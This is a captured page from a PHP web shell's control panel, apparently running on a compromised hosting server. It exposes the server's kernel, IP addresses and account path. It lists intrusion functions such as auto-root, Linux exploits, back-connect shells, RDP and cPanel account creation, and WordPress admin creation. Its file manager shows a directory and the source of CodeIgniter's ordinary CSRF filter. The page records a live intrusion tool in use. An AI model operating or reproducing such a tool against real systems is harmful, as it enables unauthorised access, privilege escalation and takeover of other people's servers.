Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.131
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
public_html /
system /
Filters /
[ HOME SHELL ]
Name
Size
Permission
Action
Exceptions
[ DIR ]
drwxr-xr-x
CSRF.php
1.82
KB
-rw-r--r--
DebugToolbar.php
1011
B
-rw-r--r--
FilterInterface.php
1.35
KB
-rw-r--r--
Filters.php
15.19
KB
-rw-r--r--
Honeypot.php
1.15
KB
-rw-r--r--
InvalidChars.php
2.82
KB
-rw-r--r--
SecureHeaders.php
2.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CSRF.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ namespace CodeIgniter\Filters; use CodeIgniter\HTTP\RequestInterface; use CodeIgniter\HTTP\ResponseInterface; use CodeIgniter\Security\Exceptions\SecurityException; use Config\Services; /** * CSRF filter. * * This filter is not intended to be used from the command line. * * @codeCoverageIgnore */ class CSRF implements FilterInterface { /** * Do whatever processing this filter needs to do. * By default it should not return anything during * normal execution. However, when an abnormal state * is found, it should return an instance of * CodeIgniter\HTTP\Response. If it does, script * execution will end and that Response will be * sent back to the client, allowing for error pages, * redirects, etc. * * @param array|null $arguments * * @throws SecurityException * * @return mixed|void */ public function before(RequestInterface $request, $arguments = null) { if ($request->isCLI()) { return; } $security = Services::security(); try { $security->verify($request); } catch (SecurityException $e) { if ($security->shouldRedirect() && ! $request->isAJAX()) { return redirect()->back()->with('error', $e->getMessage()); } throw $e; } } /** * We don't have anything to do here. * * @param array|null $arguments * * @return mixed|void */ public function after(RequestInterface $request, ResponseInterface $response, $arguments = null) { } }
Close